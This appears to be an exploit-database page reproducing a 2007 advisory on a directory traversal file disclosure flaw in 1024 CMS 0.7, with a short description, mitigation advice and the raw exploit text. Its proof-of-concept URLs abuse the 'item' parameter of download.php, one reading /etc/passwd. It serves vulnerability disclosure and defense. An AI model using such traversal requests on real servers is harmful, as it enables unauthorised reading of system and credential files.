header-logo
Suggest Exploit
vendor:
1024 CMS
by:
Dj7xpl
N/A
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: 1024 CMS
Affected Version From: 0.7
Affected Version To: 0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Disclosure Vulnerability in 1024 CMS Version 0.7

The vulnerability allows an attacker to disclose sensitive files on the target system. By manipulating the 'item' parameter in the 'download.php' script, an attacker can traverse directories and access files outside the intended directory.

Mitigation:

The vendor should release a patch that validates user input and prevents directory traversal attacks. Additionally, access controls should be implemented to restrict access to sensitive files.
Source

Exploit-DB raw data:

                                                       \#'#/
                                                       (-.-)
                              --------------------oOO---(_)---OOo-------------------
                              |                [ Y! Underground Group ]            |
                              |                 [ www.dj7xpl.2600.ir ]             |
                              |                  [ Dj7xpl @ 2600.ir ]              |
                              ------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

 [!] Portal :  1024 CMS Version 0.7
 [!] Vendor :  http://www.treble.lfhost.com
 [!] Author :  Dj7xpl
 [!] Type   :  Remote File Disclosure Vuln
 [!] We Are :  Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->

# milw0rm.com [2007-05-02]

Navigation

Suggest Exploit

Services By CQR